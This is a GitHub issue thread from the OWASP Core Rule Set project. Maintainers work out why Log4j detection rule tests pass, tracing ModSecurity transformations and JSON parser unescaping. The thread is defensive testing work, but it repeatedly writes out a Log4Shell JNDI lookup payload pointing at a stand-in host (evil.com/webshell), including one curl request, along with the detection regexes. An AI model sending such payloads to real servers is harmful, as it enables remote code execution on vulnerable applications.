### ISSUE TITLE
Understanding `htmlEntityDecode` within Log4j Rules `944150-16`, `944151-16` and `944152-16`

### ISSUE THREAD

**Issue by TimDiam0nd** [coreruleset/coreruleset#4017]
I have come across a bit of an issue with the following rules and tests:
- 944150 (944150-16)
- 944151 (944151-16)
- 944152 (944152-16)

The rules are all pretty much similar sans the different regexes 

The tests are also identical, reliant on the following json to match:
```json
{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}
```

The rules all run the following transformation functions:
- urlDecodeUni
- jsDecode
- htmlEntityDecode

The value of the JSON string after each transformation is as follows:
URL Decode: 
```json
{"foo": "\u002524{jndi:ldap://evil.com/webshell}"}
```
JS Decode: 
```
{"foo": "%24{jndi:ldap://evil.com/webshell}"}
```
Running html entity decode does not decode anything.

Now, based on that, the regexes do not match the string. 

Based off our understanding of [the spec](https://html.spec.whatwg.org/#character-references), theres no html entities left in the above to decode.
This is failing to pass because of the %24 which needs to be url decoded into a $. Html entity decoding would work if it was &#24; (as is the[ php implementation](https://www.php.net/manual/en/function.html-entity-decode.php))

Based off the ModSecurity [docs for htmlEntityDecode](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-%28v3.x%29#user-content-htmlEntityDecode), you may possibly think that the htmlEntityDecode function is just decoding HH directly, but the [code](https://github.com/owasp-modsecurity/ModSecurity/blob/a555e5a44573e50f04ad997b3b24c214c42f8e29/src/actions/transformations/html_entity_decode.cc#L41-L44) does show it looking for &# first.

My question is, should we add in another step of url decoding after both the js and html decode funcs (or even inbetween?)?

All of the regexes search for a `$`, and in this test string the dollar still remains url encoded, thus I am wondering how this test is passing or meant to pass in its current form.

**Comment by airween** [comment]
Hi @TimDiam0nd,

thanks for reporting this.

> The tests are also identical, reliant on the following json to match:
> ```
> {"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}
> ```

...

> The value of the JSON string after each transformation is as follows: URL Decode:
> 
> ```
> {"foo": "\u002524{jndi:ldap://evil.com/webshell}"}
> ```

Hmm... are you sure?

I've checked with both mod_security2 (+Apache) and libmodsecurity3 + Nginx, and I get these results:

**mod_security2**:
```
T (0) urlDecodeUni: "${jndi:ldap://evil.com/webshell}"
T (0) jsDecode: "${jndi:ldap://evil.com/webshell}"
T (0) htmlEntityDecode: "${jndi:ldap://evil.com/webshell}"
```
**libmodsecurity3**:
```
T (0) t:urlDecodeUni: "${jndi:ldap://evil.com/webshell}"
T (0) t:jsDecode: "${jndi:ldap://evil.com/webshell}"
T (0) t:htmlEntityDecode: "${jndi:ldap://evil.com/webshell}"
```
 
As you can see after `t:urlDecodeUni` the engine got the final form - and (of course) the regexes match the string:

**mod_security2**:
```
... ModSecurity: Warning. Pattern match "(?i)(?:\\\\$|&dollar;?)(?:\\\\{|&l(?:brace|cub);?)(?:[^\\\\}]{0,15}(?:\\\\$|&dollar;?)(?:\\\\{|&l(?:brace|cub);?)|jndi|ctx)" at ARGS:foo. [file "/home/airween/src/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf"] [line "227"] [id "944150"] [msg "Potential Remote Command Execution: Log4j / Log4shell"] ...
... ModSecurity: Warning. Pattern match "(?i)(?:\\\\$|&dollar;?)(?:\\\\{|&l(?:brace|cub);?)(?:[^\\\\}]*(?:\\\\$|&dollar;?)(?:\\\\{|&l(?:brace|cub);?)|jndi|ctx)" at ARGS:foo. [file "/home/airween/src/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf"] [line "265"] [id "944151"] [msg "Potential Remote Command Execution: Log4j / Log4shell"] ...
... ModSecurity: Warning. Pattern match "(?i)(?:\\\\$|&dollar;?)(?:\\\\{|&l(?:brace|cub);?)" at ARGS:foo. [file "/home/airween/src/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf"] [line "458"] [id "944152"] [msg "Potential Remote Command Execution: Log4j / Log4shell"]
```

**libmodsecurity3**:
```
... ModSecurity: Warning. Matched "Operator `Rx' with parameter `(?i)(?:\$|&dollar;?)(?:\{|&l(?:brace|cub);?)(?:[^\}]{0,15}(?:\$|&dollar;?)(?:\{|&l(?:brace|cub);?)|jndi|ctx)' against variable `ARGS:json.foo' (Value: `&#x24;&#123;jndi:ldap://evil.com/webshell' ) [file "/home/airween/src/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf"] [line "206"] [id "944150"] [rev ""] [msg "Potential Remote Command Execution: Log4j / Log4shell"] ...
... ModSecurity: Warning. Matched "Operator `Rx' with parameter `(?i)(?:\$|&dollar;?)(?:\{|&l(?:brace|cub);?)(?:[^\}]*(?:\$|&dollar;?)(?:\{|&l(?:brace|cub);?)|jndi|ctx)' against variable `ARGS:json.foo' (Value: `&#x24;&#123;jndi:ldap://evil.com/webshell' ) [file "/home/airween/src/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf"] ...
... ModSecurity: Warning. Matched "Operator `Rx' with parameter `(?i)(?:\$|&dollar;?)(?:\{|&l(?:brace|cub);?)' against variable `ARGS:json.foo' (Value: `&#x24;&#123;jndi:ldap://evil.com/webshell' ) [file "/home/airween/src/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf"] [line "431"] [id "944152"] [rev ""] [msg "Potential Remote Command Execution: Log4j / Log4shell"]...
```

> JS Decode:
> 
> ```
> {"foo": "%24{jndi:ldap://evil.com/webshell}"}
> ```
> 
> Running html entity decode does not decode anything.

Could you check your engine again?

> Now, based on that, the regexes do not match the string.

see my results above.
 
> Based off our understanding of [the spec](https://html.spec.whatwg.org/#character-references), theres no html entities left in the above to decode. 

Yes - because `t:uriDecodeUni` decodes everything.

> This is failing to pass because of the %24 which needs to be url decoded into a $. Html entity decoding would work if it was � (as is the[ php implementation](https://www.php.net/manual/en/function.html-entity-decode.php))

Sorry again, but I can't reproduce your step with the decode function. As you can see, with both engines I got the `$`.

> Based off the ModSecurity [docs for htmlEntityDecode](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-%28v3.x%29#user-content-htmlEntityDecode), you may possibly think that the htmlEntityDecode function is just decoding HH directly, but the [code](https://github.com/owasp-modsecurity/ModSecurity/blob/a555e5a44573e50f04ad997b3b24c214c42f8e29/src/actions/transformations/html_entity_decode.cc#L41-L44) does show it looking for &# first.
> 
> My question is, should we add in another step of url decoding after both the js and html decode funcs (or even inbetween?)?
> 
> All of the regexes search for a `$`, and in this test string the dollar still remains url encoded, thus I am wondering how this test is passing or meant to pass in its current form.

I think we should clarify this situation first, why do you get that result above after `t:uriDecodeUni`.


Thanks again.

**Comment by airween** [comment]
> I am not running directly against modsecurity, but our own implementation.
> ...
> The above outputs:
> ```
> Decoded String: {"foo": "\u002524{jndi:ldap://evil.com/webshell}"}
> ```

Hmm... I think I see your issue.

I just configured an Nginx/libmodsecurity3 instance with only one rule (944150), start the instance through `gdb` and send this request:

```
curl -v -H "Content-Type: application/json" -d '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' "http://localhost/"
```
The breakpoints (from the current stage of libmodsecurity3's `url_decode_uni.cc` ([1](https://github.com/owasp-modsecurity/ModSecurity/blob/v3/master/src/actions/transformations/url_decode_uni.cc#L38), [2](https://github.com/owasp-modsecurity/ModSecurity/blob/v3/master/src/actions/transformations/url_decode_uni.cc#L150)):
```gdb
(gdb) info br
Num     Type           Disp Enb Address    What
1       breakpoint     keep y   <PENDING>  actions/transformations/url_decode_uni.cc:38
2       breakpoint     keep y   <PENDING>  actions/transformations/url_decode_uni.cc:151
```
then the result:
```gdb
(gdb) run -g "daemon off; master_process off;"
Starting program: /usr/sbin/nginx -g "daemon off; master_process off;"
...
Breakpoint 1, modsecurity::actions::transformations::inplace (value="%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D", t=0x55ec5f90d930) at actions/transformations/url_decode_uni.cc:38
38	    int Code, hmap = -1;
(gdb) p value
$1 = "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"
(gdb) c
Continuing.

Breakpoint 2, modsecurity::actions::transformations::inplace (value="${jndi:ldap://evil.com/webshell}", t=0x55ec5f90d930) at actions/transformations/url_decode_uni.cc:151
151	    return changed;
(gdb) p value
$2 = "${jndi:ldap://evil.com/webshell}"
```
Please take a look at the request argument and the value that the `inplace()` function receives:
```
"\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"
"%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"
```
padded for the better visibility:
```
"\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"
"     %24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"
```
so the answer for your question is that web server (Nginx) makes a decoding, which replaces `\u0025` to `%`. In case of mod_security2, Apache does the same thing.

Btw now I can't find the post/comment/anything where we found this behavior, namely the web servers decode the request.  

The engine's references [v2](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#urldecode) and [v3](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v3.x)#urldecode), describe this behavior, please take a look at that:

> _"The transformation function should not be used against variables that have already been URL-decoded (such as request parameters) unless it is your intention to perform URL decoding twice!"_

**Comment by TimDiam0nd** [comment]
> In case of mod_security2, Apache does the same thing

I have tried replicating this, but to no avail.

Apache2 (using mod_dumpio):
```js
mod_dumpio.c(100): [client ::1:60112] mod_dumpio:  dumpio_in (data-HEAP): {"foo": "\\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}
```

Nginx debug logs:
```js
2025/02/26 11:25:01 [debug] 18817#18817: *1 write new buf t:1 f:0 0000624AE45D6B20, pos 0000624AE45D6B20, size: 195 file: 0, size: 0
2025/02/26 11:25:01 [debug] 18817#18817: *1 http write filter: l:0 f:0 s:195
2025/02/26 11:25:01 [debug] 18817#18817: *1 http output filter "/{"foo": "/u002524{jndi:ldap:/evil.com/webshell}"}?"
2025/02/26 11:25:01 [debug] 18817#18817: *1 http copy filter: "/{"foo": "/u002524{jndi:ldap:/evil.com/webshell}"}?"
2025/02/26 11:25:01 [debug] 18817#18817: *1 http postpone filter "/{"foo": "/u002524{jndi:ldap:/evil.com/webshell}"}?" 0000624AE45D6568
2025/02/26 11:25:01 [debug] 18817#18817: *1 http gzip filter
2025/02/26 11:25:01 [debug] 18817#18817: *1 malloc: 0000624AE465C000:16400
```
So with nginx the `\u` is being logged as `/u`

**Comment by airween** [comment]
I just can say what I see in output of `gdb`. I do not know Nginx inside (neither Apache), perhaps when they're logging they decode the spec characters - but they holds them in original form. This is why you get the (partially) decoded form in log.

What I see is the engine gets the variable in original format, except the `\u0025` which is already decoded as `%`, and the transformation generates a `$` sign from the `%24` sequence.

**Comment by TimDiam0nd** [comment]
I personally am a bit sceptical of that. Is it possible that its the json processor parsing the `\u`? 

https://github.com/lloyd/yajl/blob/5e3a7856e643b4d6410ddc3f84bc2f38174f2872/src/yajl_lex.c#L313

**Comment by airween** [comment]
> I personally am a bit sceptical of that. Is it possible that its the json processor parsing the `\u`?
> 
> https://github.com/lloyd/yajl/blob/5e3a7856e643b4d6410ddc3f84bc2f38174f2872/src/yajl_lex.c#L313

Probably you're right, unfortunately this could be true. I can't say you're definitely right, I think we should inspect this situation.

Anyway I tried your data with a `www-url-encoded` CT (with a valid encoding - which means the payload is this: `curl -X POST -d 'foo=%24%7Bjndi%3Aldap%3A//evil.com/webshell%7D'`), the rule works with that. I think `foo=\u002524...` is not a valid encoding for url-encoded requests.

As I wrote we should investigate this situation - but it seems like there is an [open PR](https://github.com/lloyd/yajl/pull/211/files) against that issue (if I'm not wrong).

**Comment by TimDiam0nd** [comment]
No worries, sounds good.
From a logical and security perspective, would you prefer the json decoding to run prior to transformation functions, or after (or both times), irrespective of performance?

**Comment by airween** [comment]
I think what we have to discuss. May be the next monthly chat would be a perfect appointment. (Where we welcome you too 😃)

**Comment by TimDiam0nd** [comment]
Sounds good, will join the next one and speak to you then

**Comment by TimDiam0nd** [comment]
ive just checked the timing and unfortunately i most likely wont be able to make it next week :(, but will definitely be available for Aprils.

**Comment by azurit** [comment]
> My question is, should we add in another step of url decoding after both the js and html decode funcs (or even inbetween?)?

I do not recommend this as it may open new ways of rule bypassing.

**Comment by airween** [comment]
Just for the note: I played with `yajl`'s tools, especially with `json_reformat`, and it seems that `yajl` converts the `\uNNNN` sequences into regular characters:

```
echo '{"foo":"\u002524{jndi:ldap://evil.com/webshell}"}' | json_reformat 
{
    "foo": "%24{jndi:ldap://evil.com/webshell}"
}
```

**Comment by airween** [comment]
I tried the payload with `yyjson` too, I got the same result: `\u002524` is converted into `%24`.

**Comment by veeshi** [comment]
Basically our engine doesn't have a body processor for JSON, instead there are functions for extracting JSON that can be used on variables and this has led to the confusion, but glad it is cleared up as we can automatically transpile these functions in for all rules

**Comment by theseion** [comment]
Sorry for the silence, @veeshi.

I had been expecting more of a discussion here after the monthly chat but it appears that the issue is resolved for you. Is that correct?

**Comment by veeshi** [comment]
That's correct, the last few comments have cleared it up for us

**Comment by theseion** [comment]
Great, thanks for the feeback.
